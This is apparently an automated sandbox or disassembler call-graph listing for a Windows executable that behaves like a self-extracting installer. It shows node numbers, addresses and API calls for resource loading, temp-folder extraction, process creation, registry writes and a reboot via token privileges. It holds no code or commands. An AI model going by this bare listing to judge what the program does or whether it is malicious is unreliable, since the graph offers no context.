2132->2118 2137 13fb64ba6 2132->2137 2138 13fb61144 _vsnprintf 2135->2138 2136 13fb64c3f MessageBeep 2139 13fb676d8 13 API calls 2136->2139 2161 13fb61144 2137->2161 2138->2141 2142 13fb64c50 2139->2142 2141->2136 2143 13fb64c59 MessageBoxA LocalFree 2142->2143 2144 13fb67614 2 API calls 2142->2144 2143->2118 2144->2143 2147 13fb67718 GetVersionExA 2146->2147 2155 13fb67826 2146->2155 2148 13fb6773b 2147->2148 2147->2155 2151 13fb6775e GetSystemMetrics 2148->2151 2148->2155 2149 13fb67c20 7 API calls 2150 13fb64b16 2149->2150 2150->2127 2157 13fb67614 2150->2157 2152 13fb6776f RegOpenKeyExA 2151->2152 2151->2155 2153 13fb6779e RegQueryValueExA RegCloseKey 2152->2153 2152->2155 2153->2155 2156 13fb677dc 2153->2156 2154 13fb6781b CharNextA 2154->2156 2155->2149 2156->2154 2156->2155 2158 13fb6763a EnumResourceLanguagesA 2157->2158 2159 13fb676b1 2157->2159 2158->2159 2160 13fb67679 EnumResourceLanguagesA 2158->2160 2159->2127 2160->2159 2162 13fb61170 _vsnprintf 2161->2162 2163 13fb6118b 2161->2163 2162->2163 2163->2141 2165 13fb65280 2172 13fb63908 2165->2172 2168 13fb652b2 WriteFile 2169 13fb652aa 2168->2169 2170 13fb652e3 2168->2170 2170->2169 2171 13fb6530f SendDlgItemMessageA 2170->2171 2171->2169 2173 13fb63914 MsgWaitForMultipleObjects 2172->2173 2174 13fb63936 PeekMessageA 2173->2174 2175 13fb63991 2173->2175 2174->2173 2176 13fb63955 2174->2176 2175->2168 2175->2169 2176->2173 2176->2175 2177 13fb63963 DispatchMessageA 2176->2177 2178 13fb6396e PeekMessageA 2176->2178 2177->2178 2178->2176 2970 13fb67880 2971 13fb67892 2970->2971 2977 13fb67fc8 GetModuleHandleW 2971->2977 2973 13fb678f9 __set_app_type 2974 13fb67936 2973->2974 2975 13fb6793f __setusermatherr 2974->2975 2976 13fb6794c 2974->2976 2975->2976 2978 13fb67fdd 2977->2978 2978->2973 2979 13fb67f00 2980 13fb67f32 2979->2980 2981 13fb67f0f 2979->2981 2981->2980 2982 13fb67f2b ?terminate@ 2981->2982 2982->2980 2983 13fb63680 2984 13fb6368e 2983->2984 2985 13fb63696 2983->2985 2984->2985 2986 13fb636c3 GetDesktopWindow 2984->2986 2987 13fb63709 EndDialog 2985->2987 2988 13fb6369b 2985->2988 2989 13fb64938 14 API calls 2986->2989 2987->2988 2990 13fb636d4 SetWindowTextA SetDlgItemTextA SetForegroundWindow 2989->2990 2990->2988 2991 13fb64740 2992 13fb64749 SendMessageA 2991->2992 2993 13fb6475a 2991->2993 2992->2993 2994 13fb653c0 2996 13fb653fe 2994->2996 2997 13fb653dc 2994->2997 2995 13fb6541d SetFilePointer 2995->2997 2996->2995 2996->2997 2998 13fb633c0 2999 13fb633e7 2998->2999 3000 13fb6364a EndDialog 2998->3000 3001 13fb633f7 2999->3001 3002 13fb635e4 GetDesktopWindow 2999->3002 3003 13fb633fb 3000->3003 3001->3003 3006 13fb634b3 GetDlgItemTextA 3001->3006 3007 13fb6340b 3001->3007 3004 13fb64938 14 API calls 3002->3004 3005 13fb635f5 SetWindowTextA SendDlgItemMessageA 3004->3005 3005->3003 3009 13fb6362c GetDlgItem EnableWindow 3005->3009 3008 13fb634d6 3006->3008 3031 13fb63555 3006->3031 3010 13fb63414 3007->3010 3011 13fb6349c EndDialog 3007->3011 3017 13fb6350c GetFileAttributesA 3008->3017 3008->3031 3009->3003 3010->3003 3012 13fb63421 LoadStringA 3010->3012 3011->3003 3013 13fb63468 3012->3013 3022 13fb63447 3012->3022 3035 13fb64768 LoadLibraryA 3013->3035 3015 13fb64a70 24 API calls 3015->3003 3020 13fb63566 3017->3020 3021 13fb6351a 3017->3021 3018 13fb64a70 24 API calls 3034 13fb63461 3018->3034 3019 13fb63475 SetDlgItemTextA 3019->3003 3019->3022 3023 13fb673cc CharPrevA 3020->3023 3024 13fb64a70 24 API calls 3021->3024 3022->3018 3026 13fb6357a 3023->3026 3027 13fb6353d 3024->3027 3025 13fb635b7 EndDialog 3025->3003 3029 13fb6648c 31 API calls 3026->3029 3027->3003 3028 13fb63546 CreateDirectoryA 3027->3028 3028->3020 3028->3031 3030 13fb63582 3029->3030 3030->3031 3032 13fb6358d 3030->3032 3031->3015 3033 13fb665b0 40 API calls 3032->3033 3032->3034 3033->3034 3034->3003 3034->3025 3036 13fb648f2 3035->3036 3037 13fb647a2 GetProcAddress 3035->3037 3041 13fb64a70 24 API calls 3036->3041 3038 13fb648e2 FreeLibrary 3037->3038 3039 13fb647be GetProcAddress 3037->3039 3038->3036 3039->3038 3040 13fb647d8 GetProcAddress 3039->3040 3040->3038 3042 13fb647f4 3040->3042 3043 13fb6346d 3041->3043 3044 13fb64803 GetTempPathA 3042->3044 3049 13fb64843 3042->3049 3043->3003 3043->3019 3045 13fb64815 3044->3045 3045->3045 3046 13fb6481e CharPrevA 3045->3046 3047 13fb64832 CharPrevA 3046->3047 3046->3049 3047->3049 3048 13fb648cc FreeLibrary 3048->3043 3049->3048 2179 13fb679b0 2200 13fb68114 2179->2200 2183 13fb679fb 2184 13fb67a0d 2183->2184 2185 13fb67a27 Sleep 2183->2185 2186 13fb67a1d _amsg_exit 2184->2186 2192 13fb67a34 2184->2192 2185->2183 2187 13fb67a89 2186->2187 2188 13fb67aac _initterm 2187->2188 2189 13fb67a8d 2187->2189 2190 13fb67ac9 _IsNonwritableInCurrentImage 2187->2190 2188->2190 2190->2189 2191 13fb67ba7 _ismbblead 2190->2191 2193 13fb67b2c 2190->2193 2191->2190 2192->2187 2192->2189 2204 13fb67f40 SetUnhandledExceptionFilter 2192->2204 2205 13fb629e4 GetVersion 2193->2205 2196 13fb67b76 exit 2197 13fb67b7e 2196->2197 2197->2189 2198 13fb67b87 _cexit 2197->2198 2198->2189 2201 13fb679b9 GetStartupInfoW 2200->2201 2202 13fb68140 6 API calls 2200->2202 2201->2183 2203 13fb681bf 2202->2203 2203->2201 2204->2192 2206 13fb62a05 2205->2206 2207 13fb62a41 2205->2207 2206->2207 2209 13fb62a09 GetModuleHandleW 2206->2209 2229 13fb62b24 2207->2229 2209->2207 2210 13fb62a1b GetProcAddress 2209->2210 2210->2207 2212 13fb62a30 2210->2212 2212->2207 2213 13fb62af3 2215 13fb62b05 2213->2215 2216 13fb62aff CloseHandle 2213->2216 2215->2196 2215->2197 2216->2215 2220 13fb62aa3 2220->2213 2221 13fb62ad8 2220->2221 2222 13fb62aad 2220->2222 2225 13fb62ae1 ExitWindowsEx 2221->2225 2226 13fb62aee 2221->2226 2224 13fb64a70 24 API calls 2222->2224 2227 13fb62ad3 2224->2227 2225->2213 2343 13fb61b44 GetCurrentProcess OpenProcessToken 2226->2343 2227->2213 2227->2221 2230 13fb682b9 2229->2230 2231 13fb62b69 memset memset 2230->2231 2351 13fb64cc0 FindResourceA SizeofResource 2231->2351 2234 13fb62bc3 CreateEventA SetEvent 2235 13fb64cc0 7 API calls 2234->2235 2236 13fb62bf6 2235->2236 2239 13fb62c31 2236->2239 2248 13fb62bfa 2236->2248 2237 13fb64a70 24 API calls 2238 13fb62dfa 2237->2238 2243 13fb67c20 7 API calls 2238->2243 2240 13fb62cf1 2239->2240 2241 13fb64cc0 7 API calls 2239->2241 2356 13fb66998 2240->2356 2244 13fb62c50 2241->2244 2242 13fb64a70 24 API calls 2266 13fb62c18 2242->2266 2246 13fb62a52 2243->2246 2244->2248 2249 13fb62c62 CreateMutexA 2244->2249 2246->2213 2274 13fb62e28 2246->2274 2248->2242 2249->2240 2252 13fb62c7c GetLastError 2249->2252 2250 13fb62d03 2250->2237 2251 13fb62d12 2253 13fb62d1b 2251->2253 2254 13fb62d2c FindResourceA 2251->2254 2252->2240 2255 13fb62c89 2252->2255 2382 13fb61f00 2253->2382 2257 13fb62d47 LoadResource 2254->2257 2258 13fb62d56 2254->2258 2259 13fb62cb6 2255->2259 2260 13fb62c9e 2255->2260 2257->2258 2262 13fb62d65 2258->2262 2263 13fb62d5f #17 2258->2263 2264 13fb64a70 24 API calls 2259->2264 2261 13fb64a70 24 API calls 2260->2261 2265 13fb62cb4 2261->2265 2262->2266 2397 13fb639a0 GetVersionExA 2262->2397 2263->2262 2267 13fb62cd0 2264->2267 2268 13fb62cd5 CloseHandle 2265->2268 2266->2238 2267->2240 2267->2268 2268->2238 2273 13fb67304 28 API calls 2273->2266 2275 13fb62e52 2274->2275 2276 13fb62e7d 2274->2276 2278 13fb62e70 2275->2278 2487 13fb65c0c 2275->2487 2506 13fb65b4c 2276->2506 2657 13fb63d0c 2278->2657 2285 13fb67c20 7 API calls 2287 13fb62a5f 2285->2287 2318 13fb630c4 2287->2318 2288 13fb62e97 GetSystemDirectoryA 2289 13fb673cc CharPrevA 2288->2289 2290 13fb62ebc LoadLibraryA 2289->2290 2291 13fb62ef3 FreeLibrary 2290->2291 2292 13fb62ecf GetProcAddress 2290->2292 2294 13fb62f08 2291->2294 2295 13fb62f9f SetCurrentDirectoryA 2291->2295 2292->2291 2293 13fb62ee4 DecryptFileA 2292->2293 2293->2291 2294->2295 2296 13fb62f14 GetWindowsDirectoryA 2294->2296 2297 13fb62f2b 2295->2297 2306 13fb62fba 2295->2306 2296->2297 2299 13fb62f86 2296->2299 2300 13fb64a70 24 API calls 2297->2300 2298 13fb63048 2304 13fb62174 18 API calls 2298->2304 2310 13fb63070 2298->2310 2316 13fb62f63 2298->2316 2568 13fb665b0 GetCurrentDirectoryA SetCurrentDirectoryA 2299->2568 2302 13fb62f49 GetLastError 2300->2302 2302->2316 2304->2310 2305 13fb63024 2590 13fb65940 2305->2590 2306->2298 2306->2305 2308 13fb62ff4 2306->2308 2307 13fb63091 2314 13fb630ac 2307->2314 2307->2316 2311 13fb67304 28 API calls 2308->2311 2310->2307 2612 13fb63e4c 2310->2612 2312 13fb6301f 2311->2312 2312->2316 2675 13fb66fb0 2312->2675 2685 13fb6466c 2314->2685 2316->2285 2319 13fb630ec 2318->2319 2320 13fb63133 2319->2320 2321 13fb63118 LocalFree LocalFree 2319->2321 2322 13fb63101 SetFileAttributesA DeleteFileA 2319->2322 2324 13fb631c7 2320->2324 2329 13fb631b0 SetCurrentDirectoryA 2320->2329 2330 13fb6745c 4 API calls 2320->2330 2321->2319 2322->2321 2323 13fb6322b 2325 13fb67c20 7 API calls 2323->2325 2324->2323 2326 13fb631e3 RegOpenKeyExA 2324->2326 2327 13fb62a66 2325->2327 2326->2323 2328 13fb6320e RegDeleteValueA RegCloseKey 2326->2328 2327->2213 2327->2220 2332 13fb62174 2327->2332 2328->2323 2331 13fb61f00 16 API calls 2329->2331 2330->2329 2331->2324 2333 13fb6227e 2332->2333 2334 13fb6218c 2332->2334 2902 13fb620c0 GetWindowsDirectoryA 2333->2902 2336 13fb62192 2334->2336 2337 13fb6220e RegOpenKeyExA 2334->2337 2339 13fb62209 2336->2339 2341 13fb621a2 RegOpenKeyExA 2336->2341 2338 13fb6223b RegQueryInfoKeyA 2337->2338 2337->2339 2340 13fb621f4 RegCloseKey 2338->2340 2339->2220 2340->2339 2341->2339 2342 13fb621cf RegQueryValueExA 2341->2342 2342->2340 2344 13fb61b9b LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2343->2344 2346 13fb61b78 2343->2346 2345 13fb61c03 ExitWindowsEx 2344->2345 2344->2346 2345->2346 2348 13fb61b94 2345->2348 2347 13fb64a70 24 API calls 2346->2347 2347->2348 2349 13fb67c20 7 API calls 2348->2349 2350 13fb61c2b 2349->2350 2350->2213 2352 13fb64cff 2351->2352 2353 13fb62bb3 2351->2353 2352->2353 2354 13fb64d08 FindResourceA LoadResource LockResource 2352->2354 2353->2234 2353->2250 2354->2353 2355 13fb64d35 memcpy_s FreeResource 2354->2355 2355->2353 2363 13fb66b00 2356->2363 2380 13fb669e2 2356->2380 2357 13fb67c20 7 API calls 2359 13fb62cff 2357->2359 2358 13fb66ab4 2361 13fb66ad1 GetModuleFileNameA 2358->2361 2358->2363 2359->2250 2359->2251 2360 13fb66a0d CharNextA 2360->2380 2362 13fb66af3 2361->2362 2361->2363 2431 13fb6755c 2362->2431 2363->2357 2365 13fb66fa4 2440 13fb67df8 RtlCaptureContext RtlLookupFunctionEntry 2365->2440 2368 13fb66b1c CharUpperA 2369 13fb66f2f 2368->2369 2368->2380 2370 13fb64a70 24 API calls 2369->2370 2371 13fb66f52 2370->2371 2372 13fb66f64 ExitProcess 2371->2372 2373 13fb66f5e CloseHandle 2371->2373 2373->2372 2374 13fb66c6f CharUpperA 2374->2380 2375 13fb66c1e CompareStringA 2375->2380 2376 13fb66cc7 CharUpperA 2376->2380 2377 13fb66d58 CharUpperA 2377->2380 2378 13fb66bae CharUpperA 2378->2380 2379 13fb674ec IsDBCSLeadByte CharNextA 2379->2380 2380->2358 2380->2360 2380->2363 2380->2365 2380->2368 2380->2374 2380->2375 2380->2376 2380->2377 2380->2378 2380->2379 2436 13fb673cc 2380->2436 2383 13fb62093 2382->2383 2386 13fb61f3a 2382->2386 2384 13fb67c20 7 API calls 2383->2384 2385 13fb620a2 2384->2385 2385->2266 2387 13fb61f90 FindFirstFileA 2386->2387 2387->2383 2395 13fb61fac 2387->2395 2388 13fb61fe6 lstrcmpA 2390 13fb6206b FindNextFileA 2388->2390 2391 13fb61ffc lstrcmpA 2388->2391 2389 13fb62041 2392 13fb62052 SetFileAttributesA DeleteFileA 2389->2392 2393 13fb62081 FindClose RemoveDirectoryA 2390->2393 2390->2395 2391->2390 2391->2395 2392->2390 2393->2383 2394 13fb673cc CharPrevA 2394->2395 2395->2388 2395->2389 2395->2390 2395->2394 2396 13fb61f00 8 API calls 2395->2396 2396->2395 2402 13fb639ff 2397->2402 2405 13fb639f5 2397->2405 2398 13fb64a70 24 API calls 2399 13fb63c9f 2398->2399 2400 13fb67c20 7 API calls 2399->2400 2401 13fb62d7e 2400->2401 2401->2238 2401->2266 2412 13fb612c0 2401->2412 2402->2399 2404 13fb63b57 2402->2404 2402->2405 2446 13fb62628 2402->2446 2404->2399 2404->2405 2406 13fb63c5d MessageBeep 2404->2406 2405->2398 2405->2399 2407 13fb676d8 13 API calls 2406->2407 2408 13fb63c6a 2407->2408 2409 13fb63c73 MessageBoxA 2408->2409 2410 13fb67614 2 API calls 2408->2410 2409->2399 2410->2409 2413 13fb61310 2412->2413 2418 13fb61447 2412->2418 2478 13fb611c0 LoadLibraryA 2413->2478 2415 13fb67c20 7 API calls 2417 13fb6146c 2415->2417 2417->2266 2417->2273 2418->2415 2419 13fb61321 GetCurrentProcess OpenProcessToken 2419->2418 2420 13fb6133f GetTokenInformation 2419->2420 2421 13fb61438 CloseHandle 2420->2421 2422 13fb61362 GetLastError 2420->2422 2421->2418 2422->2421 2423 13fb61371 LocalAlloc 2422->2423 2423->2421 2424 13fb61388 GetTokenInformation 2423->2424 2425 13fb6142f LocalFree 2424->2425 2426 13fb613ac AllocateAndInitializeSid 2424->2426 2425->2421 2426->2425 2427 13fb613ef 2426->2427 2428 13fb61425 FreeSid 2427->2428 2429 13fb613fc EqualSid 2427->2429 2430 13fb6141a 2427->2430 2428->2425 2429->2427 2429->2430 2430->2428 2432 13fb675c1 2431->2432 2433 13fb6757c 2431->2433 2432->2363 2434 13fb67584 IsDBCSLeadByte 2433->2434 2435 13fb675a4 CharNextA 2433->2435 2434->2433 2435->2432 2435->2433 2437 13fb673ec 2436->2437 2437->2437 2438 13fb67410 CharPrevA 2437->2438 2439 13fb673fe 2437->2439 2438->2439 2439->2380 2441 13fb67e77 2440->2441 2442 13fb67e35 RtlVirtualUnwind 2440->2442 2445 13fb67c44 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2441->2445 2442->2441 2447 13fb627f9 2446->2447 2457 13fb62666 2446->2457 2448 13fb62814 2447->2448 2449 13fb6280b GlobalFree 2447->2449 2448->2404 2449->2448 2451 13fb62699 GetFileVersionInfoSizeA 2452 13fb626b0 GlobalAlloc 2451->2452 2451->2457 2452->2447 2453 13fb626c9 GlobalLock 2452->2453 2453->2447 2454 13fb626de GetFileVersionInfoA 2453->2454 2455 13fb626fc VerQueryValueA 2454->2455 2454->2457 2456 13fb627bd GlobalUnlock 2455->2456 2455->2457 2456->2457 2457->2447 2457->2451 2457->2456 2458 13fb627af GlobalUnlock 2457->2458 2459 13fb62448 2457->2459 2458->2447 2460 13fb62487 CharUpperA CharNextA CharNextA 2459->2460 2461 13fb625dc GetSystemDirectoryA 2459->2461 2462 13fb624b6 2460->2462 2463 13fb625d9 2460->2463 2464 13fb625e7 2461->2464 2465 13fb625c9 GetWindowsDirectoryA 2462->2465 2469 13fb624c0 2462->2469 2463->2461 2466 13fb625fb 2464->2466 2467 13fb673cc CharPrevA 2464->2467 2465->2464 2468 13fb67c20 7 API calls 2466->2468 2467->2466 2470 13fb6260a 2468->2470 2471 13fb673cc CharPrevA 2469->2471 2470->2457 2472 13fb6251f RegOpenKeyExA 2471->2472 2472->2464 2473 13fb6254c RegQueryValueExA 2472->2473 2474 13fb625bc RegCloseKey 2473->2474 2475 13fb62579 2473->2475 2474->2464 2476 13fb62582 ExpandEnvironmentStringsA 2475->2476 2477 13fb6259a 2475->2477 2476->2477 2477->2474 2479 13fb61291 2478->2479 2480 13fb6120f GetProcAddress 2478->2480 2481 13fb67c20 7 API calls 2479->2481 2482 13fb61227 AllocateAndInitializeSid 2480->2482 2483 13fb61288 FreeLibrary 2480->2483 2484 13fb612a0 2481->2484 2482->2483 2485 13fb6126a FreeSid 2482->2485 2483->2479 2484->2418 2484->2419 2485->2483 2488 13fb64cc0 7 API calls 2487->2488 2489 13fb65c27 LocalAlloc 2488->2489 2490 13fb65c3f 2489->2490 2491 13fb65c7c 2489->2491 2492 13fb64a70 24 API calls 2490->2492 2493 13fb64cc0 7 API calls 2491->2493 2494 13fb65c5d GetLastError 2492->2494 2495 13fb65c8e 2493->2495 2502 13fb62e5f 2494->2502 2496 13fb65cc5 lstrcmp 2495->2496 2497 13fb65c92 2495->2497 2499 13fb65ce9 2496->2499 2500 13fb65cd9 LocalFree 2496->2500 2498 13fb64a70 24 API calls 2497->2498 2501 13fb65cb0 LocalFree 2498->2501 2503 13fb64a70 24 API calls 2499->2503 2500->2502 2501->2502 2502->2276 2502->2278 2502->2316 2504 13fb65d0b LocalFree 2503->2504 2505 13fb65d1b 2504->2505 2505->2502 2507 13fb64cc0 7 API calls 2506->2507 2508 13fb65b69 2507->2508 2509 13fb65b6e 2508->2509 2510 13fb65bb2 2508->2510 2512 13fb64a70 24 API calls 2509->2512 2511 13fb64cc0 7 API calls 2510->2511 2513 13fb65bcb 2511->2513 2519 13fb65b8d 2512->2519 2514 13fb66fb0 13 API calls 2513->2514 2515 13fb65bd7 2514->2515 2516 13fb62e82 2515->2516 2517 13fb65bdb 2515->2517 2516->2316 2520 13fb66028 2516->2520 2518 13fb64a70 24 API calls 2517->2518 2518->2519 2519->2516 2521 13fb64cc0 7 API calls 2520->2521 2522 13fb6606a LocalAlloc 2521->2522 2523 13fb660c3 2522->2523 2524 13fb66084 2522->2524 2526 13fb64cc0 7 API calls 2523->2526 2525 13fb64a70 24 API calls 2524->2525 2527 13fb660a2 GetLastError 2525->2527 2528 13fb660d5 2526->2528 2541 13fb660bc 2527->2541 2529 13fb6610c lstrcmpA LocalFree 2528->2529 2530 13fb660d9 2528->2530 2532 13fb66192 2529->2532 2539 13fb66147 2529->2539 2531 13fb64a70 24 API calls 2530->2531 2535 13fb660f7 LocalFree 2531->2535 2533 13fb66433 2532->2533 2537 13fb661aa GetTempPathA 2532->2537 2536 13fb67304 28 API calls 2533->2536 2534 13fb67c20 7 API calls 2538 13fb62e8f 2534->2538 2535->2541 2536->2541 2542 13fb661c7 2537->2542 2548 13fb661fa 2537->2548 2538->2288 2538->2316 2540 13fb65e4c 57 API calls 2539->2540 2543 13fb66167 2540->2543 2541->2534 2698 13fb65e4c 2542->2698 2543->2541 2545 13fb6616f 2543->2545 2547 13fb64a70 24 API calls 2545->2547 2549 13fb6618d 2547->2549 2548->2541 2550 13fb66400 GetWindowsDirectoryA 2548->2550 2551 13fb6624e GetDriveTypeA 2548->2551 2549->2541 2553 13fb665b0 40 API calls 2550->2553 2554 13fb66265 GetFileAttributesA 2551->2554 2566 13fb66260 2551->2566 2553->2548 2554->2566 2556 13fb65e4c 57 API calls 2556->2548 2557 13fb6629e GetDiskFreeSpaceA 2559 13fb662c6 MulDiv 2557->2559 2557->2566 2558 13fb6229c 25 API calls 2558->2566 2559->2566 2560 13fb6633f GetWindowsDirectoryA 2560->2566 2561 13fb673cc CharPrevA 2563 13fb66361 GetFileAttributesA 2561->2563 2562 13fb665b0 40 API calls 2562->2566 2564 13fb66371 CreateDirectoryA 2563->2564 2563->2566 2564->2566 2565 13fb66398 SetFileAttributesA 2565->2566 2566->2541 2566->2550 2566->2551 2566->2554 2566->2557 2566->2558 2566->2560 2566->2561 2566->2562 2566->2565 2567 13fb65e4c 57 API calls 2566->2567 2567->2566 2569 13fb66612 2568->2569 2570 13fb6664e GetDiskFreeSpaceA 2568->2570 2571 13fb64a70 24 API calls 2569->2571 2572 13fb6685d memset GetLastError GetLastError FormatMessageA 2570->2572 2573 13fb66689 MulDiv 2570->2573 2575 13fb6662f GetLastError 2571->2575 2574 13fb668ba 2572->2574 2573->2572 2576 13fb666b1 GetVolumeInformationA 2573->2576 2579 13fb64a70 24 API calls 2574->2579 2581 13fb6683b 2575->2581 2577 13fb66745 SetCurrentDirectoryA 2576->2577 2578 13fb666e3 memset GetLastError GetLastError FormatMessageA 2576->2578 2584 13fb66766 2577->2584 2578->2574 2580 13fb668d5 SetCurrentDirectoryA 2579->2580 2580->2581 2582 13fb67c20 7 API calls 2581->2582 2583 13fb62f9b 2582->2583 2583->2295 2583->2316 2585 13fb667ae 2584->2585 2588 13fb667d2 2584->2588 2586 13fb64a70 24 API calls 2585->2586 2587 13fb667cd 2586->2587 2587->2581 2588->2581 2749 13fb62324 2588->2749 2591 13fb64cc0 7 API calls 2590->2591 2592 13fb6595b FindResourceA LoadResource LockResource 2591->2592 2593 13fb6599a 2592->2593 2609 13fb65b37 2592->2609 2594 13fb659a6 GetDlgItem ShowWindow GetDlgItem ShowWindow 2593->2594 2595 13fb659dc 2593->2595 2594->2595 2766 13fb65814 #20 2595->2766 2598 13fb659e5 2603 13fb64a70 24 API calls 2598->2603 2599 13fb659ef #20 2599->2598 2600 13fb65a51 #22 2599->2600 2601 13fb65a8f #23 2600->2601 2602 13fb65ac9 2600->2602 2601->2598 2601->2602 2605 13fb65ad5 FreeResource 2602->2605 2606 13fb65ae3 2602->2606 2604 13fb65ac7 2603->2604 2604->2602 2605->2606 2607 13fb65b0d 2606->2607 2608 13fb65aef 2606->2608 2607->2609 2611 13fb65b1f SendMessageA 2607->2611 2610 13fb64a70 24 API calls 2608->2610 2609->2312 2610->2607 2611->2609 2613 13fb63ea0 2612->2613 2635 13fb63eb7 2612->2635 2614 13fb64cc0 7 API calls 2613->2614 2614->2635 2615 13fb63ecd memset 2615->2635 2616 13fb63fd6 2617 13fb64a70 24 API calls 2616->2617 2618 13fb63ff5 2617->2618 2619 13fb6424c 2618->2619 2622 13fb67c20 7 API calls 2619->2622 2620 13fb64cc0 7 API calls 2620->2635 2623 13fb6425d 2622->2623 2623->2307 2624 13fb64077 CompareStringA 2625 13fb64332 2624->2625 2624->2635 2625->2619 2626 13fb6434c RegOpenKeyExA 2625->2626 2626->2619 2629 13fb6437b RegQueryValueExA 2626->2629 2627 13fb642f9 2631 13fb64a70 24 API calls 2627->2631 2628 13fb64243 LocalFree 2628->2619 2633 13fb6445e RegCloseKey 2629->2633 2634 13fb643ba memset GetSystemDirectoryA 2629->2634 2636 13fb64318 LocalFree 2631->2636 2633->2619 2637 13fb643e5 2634->2637 2638 13fb643fb 2634->2638 2635->2615 2635->2616 2635->2619 2635->2620 2635->2624 2635->2625 2635->2627 2635->2628 2639 13fb63f85 CompareStringA 2635->2639 2641 13fb6421d LocalFree 2635->2641 2654 13fb64110 2635->2654 2778 13fb615f8 2635->2778 2817 13fb61c38 memset memset RegCreateKeyExA 2635->2817 2844 13fb64478 CreateProcessA 2635->2844 2636->2619 2642 13fb673cc CharPrevA 2637->2642 2643 13fb61144 _vsnprintf 2638->2643 2639->2635 2641->2625 2641->2635 2642->2638 2644 13fb64424 RegSetValueExA 2643->2644 2644->2633 2645 13fb642d4 2647 13fb64a70 24 API calls 2645->2647 2646 13fb64121 GetProcAddress 2648 13fb6427e 2646->2648 2646->2654 2651 13fb642f7 2647->2651 2649 13fb64a70 24 API calls 2648->2649 2652 13fb642a1 FreeLibrary 2649->2652 2653 13fb642aa LocalFree GetLastError 2651->2653 2652->2653 2653->2619 2654->2645 2654->2646 2655 13fb641f6 FreeLibrary 2654->2655 2656 13fb6423d FreeLibrary 2654->2656 2857 13fb6723c 2654->2857 2655->2641 2656->2628 2658 13fb64cc0 7 API calls 2657->2658 2659 13fb63d23 LocalAlloc 2658->2659 2660 13fb63d3f 2659->2660 2661 13fb63d7e 2659->2661 2662 13fb64a70 24 API calls 2660->2662 2663 13fb64cc0 7 API calls 2661->2663 2664 13fb63d5d GetLastError 2662->2664 2665 13fb63d90 2663->2665 2670 13fb62e75 2664->2670 2666 13fb63d94 2665->2666 2667 13fb63dcb lstrcmpA 2665->2667 2671 13fb64a70 24 API calls 2666->2671 2668 13fb63e27 LocalFree 2667->2668 2669 13fb63de3 2667->2669 2668->2670 2673 13fb67304 28 API calls 2669->2673 2670->2276 2670->2316 2672 13fb63db2 LocalFree 2671->2672 2672->2670 2674 13fb63e03 LocalFree 2673->2674 2674->2670 2682 13fb66ffe 2675->2682 2676 13fb61144 _vsnprintf 2677 13fb6704d FindResourceA 2676->2677 2678 13fb66fe2 LoadResource LockResource 2677->2678 2679 13fb67069 2677->2679 2678->2679 2678->2682 2680 13fb67c20 7 API calls 2679->2680 2681 13fb67090 2680->2681 2681->2298 2682->2676 2683 13fb6706b FreeResource 2682->2683 2684 13fb6702c FreeResource 2682->2684 2683->2679 2684->2682 2686 13fb64cc0 7 API calls 2685->2686 2687 13fb64687 LocalAlloc 2686->2687 2688 13fb646c3 2687->2688 2689 13fb646a3 2687->2689 2691 13fb64cc0 7 API calls 2688->2691 2690 13fb64a70 24 API calls 2689->2690 2694 13fb646c1 2690->2694 2692 13fb646d5 2691->2692 2693 13fb646ef lstrcmpA 2692->2693 2695 13fb646d9 2692->2695 2693->2695 2696 13fb64722 LocalFree 2693->2696 2694->2316 2697 13fb64a70 24 API calls 2695->2697 2696->2694 2697->2696 2699 13fb65f3f 2698->2699 2700 13fb65e7e 2698->2700 2737 13fb6648c 2699->2737 2726 13fb65d44 2700->2726 2704 13fb67c20 7 API calls 2708 13fb6600d 2704->2708 2706 13fb65edf GetSystemInfo 2718 13fb65ef3 2706->2718 2707 13fb65f2e 2711 13fb673cc CharPrevA 2707->2711 2708->2541 2720 13fb6229c GetWindowsDirectoryA 2708->2720 2709 13fb65fa5 2714 13fb65fed 2709->2714 2715 13fb665b0 40 API calls 2709->2715 2710 13fb65f8c CreateDirectoryA 2712 13fb65fd3 GetLastError 2710->2712 2713 13fb65f9b 2710->2713 2711->2699 2712->2714 2713->2709 2714->2704 2716 13fb65fb6 2715->2716 2716->2714 2719 13fb65fc2 RemoveDirectoryA 2716->2719 2717 13fb673cc CharPrevA 2717->2707 2718->2707 2718->2717 2719->2714 2721 13fb622d4 2720->2721 2722 13fb622f2 2720->2722 2723 13fb64a70 24 API calls 2721->2723 2724 13fb67c20 7 API calls 2722->2724 2723->2722 2725 13fb6230d 2724->2725 2725->2548 2725->2556 2728 13fb65d6f 2726->2728 2727 13fb61144 _vsnprintf 2727->2728 2728->2727 2729 13fb673cc CharPrevA 2728->2729 2732 13fb65dcb GetTempFileNameA 2728->2732 2730 13fb65dac RemoveDirectoryA GetFileAttributesA 2729->2730 2730->2728 2731 13fb65e23 CreateDirectoryA 2730->2731 2731->2732 2733 13fb65dfe 2731->2733 2732->2733 2734 13fb65de5 DeleteFileA CreateDirectoryA 2732->2734 2735 13fb67c20 7 API calls 2733->2735 2734->2733 2736 13fb65e10 2735->2736 2736->2706 2736->2707 2736->2714 2738 13fb664a7 2737->2738 2738->2738 2739 13fb664b0 LocalAlloc 2738->2739 2740 13fb66519 2739->2740 2741 13fb664ca 2739->2741 2744 13fb673cc CharPrevA 2740->2744 2742 13fb64a70 24 API calls 2741->2742 2743 13fb664e8 GetLastError 2742->2743 2748 13fb65f88 2743->2748 2745 13fb66538 CreateFileA LocalFree 2744->2745 2745->2743 2746 13fb66579 CloseHandle GetFileAttributesA 2745->2746 2746->2743 2747 13fb66594 2746->2747 2747->2743 2747->2748 2748->2709 2748->2710 2750 13fb62351 2749->2750 2751 13fb6238e 2749->2751 2752 13fb61144 _vsnprintf 2750->2752 2753 13fb623d7 2751->2753 2754 13fb62393 2751->2754 2755 13fb62369 2752->2755 2757 13fb62389 2753->2757 2761 13fb61144 _vsnprintf 2753->2761 2756 13fb61144 _vsnprintf 2754->2756 2758 13fb64a70 24 API calls 2755->2758 2760 13fb623ab 2756->2760 2759 13fb67c20 7 API calls 2757->2759 2758->2757 2762 13fb62435 2759->2762 2763 13fb64a70 24 API calls 2760->2763 2764 13fb623f3 2761->2764 2762->2581 2763->2757 2765 13fb64a70 24 API calls 2764->2765 2765->2757 2767 13fb6589b 2766->2767 2777 13fb65904 2766->2777 2768 13fb64fa0 29 API calls 2767->2768 2770 13fb658b2 2768->2770 2769 13fb67c20 7 API calls 2771 13fb6591a 2769->2771 2772 13fb658bb #21 2770->2772 2770->2777 2771->2598 2771->2599 